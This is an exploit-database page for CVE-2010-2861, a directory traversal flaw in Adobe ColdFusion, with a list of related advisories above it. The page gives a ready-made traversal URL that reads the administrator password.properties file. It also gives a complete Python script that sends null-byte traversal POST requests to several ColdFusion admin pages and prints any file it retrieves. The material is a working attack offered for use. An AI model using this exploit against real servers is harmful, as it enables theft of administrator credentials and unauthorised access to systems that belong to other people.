Adobe ColdFusion Directory Traversal Vulnerability

🗓️ 14 Aug 2010 00:00:00Reported by unknownType

zdt🔗 0day.today👁 36 Views

Adobe ColdFusion Directory Traversal Vulnerability, working GET request, exploitation method details, 0day.today exploit lin

Reporter	Title	Published	Views	Family All 35
0day.today	Adobe ColdFusion - Directory Traversal	17 Mar 201100:00	–	zdt
ATTACKERKB	CVE-2010-2861	11 Aug 201000:00	–	attackerkb
BDU FSTEC	The vulnerability of the ColdFusion software platform arises from incorrect path name restrictions for restricted access directories, allowing attackers to read arbitrary files.	8 Feb 202300:00	–	bdu_fstec
canvas	Immunity Canvas: CF_DIRECTORY_TRAVERSAL	11 Aug 201018:47	–	canvas
Circl	CVE-2010-2861	14 Aug 201000:00	–	circl
CISA KEV Catalog	Adobe ColdFusion Directory Traversal Vulnerability	25 Mar 202200:00	–	cisa_kev
CISA	CISA and Partners Release Advisory on Ghost (Cring) Ransomware	19 Feb 202512:00	–	cisa
Tenable Nessus	Adobe ColdFusion 'locale' Parameter Directory Traversal	16 Aug 201000:00	–	nessus
Check Point Advisories	Adobe ColdFusion Directory Traversal (APSB10-18; CVE-2010-2861)	5 Sep 201000:00	–	checkpoint_advisories
CVE	CVE-2010-2861	11 Aug 201018:00	–	cve

==================================================
Adobe ColdFusion Directory Traversal Vulnerability
==================================================

#
Working GET request courtesy of carnal0wnage:
#
http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
#
#
 
 
#!/usr/bin/python
 
# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability
# detailed information about the exploitation of this vulnerability:
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
 
# leo 13.08.2010
 
import sys
import socket
import re
 
# in case some directories are blocked
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm", "/CFIDE/administrator/archives/index.cfm", "/cfide/install.cfm", "/CFIDE/administrator/entman/index.cfm")
 
post = """POST %s HTTP/1.1
Host: %s
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
 
locale=%%00%s%%00a"""
 
def main():
    if len(sys.argv) != 4:
        print "usage: %s <host> <port> <file_path>" % sys.argv[0]
        print "example: %s localhost 80 ../../../../../../../lib/password.properties" % sys.argv[0]
        print "if successful, the file will be printed"
        return
     
    host = sys.argv[1]
    port = sys.argv[2]
    path = sys.argv[3]
 
    for f in filenames:
        print "------------------------------"
        print "trying", f
 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, int(port)))
        s.send(post % (f, host, len(path) + 14, path))
 
        buf = ""
        while 1:
            buf_s = s.recv(1024)
            if len(buf_s) == 0:
                break
            buf += buf_s
        
        m = re.search('<title>(.*)</title>', buf, re.S)
        if m != None:
            title = m.groups(0)[0]
            print "title from server in %s:" % f
            print "------------------------------"
            print m.groups(0)[0]
            print "------------------------------"
 
if __name__ == '__main__':
    main()



#  0day.today [2018-02-20]  #

14 Aug 2010 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.94237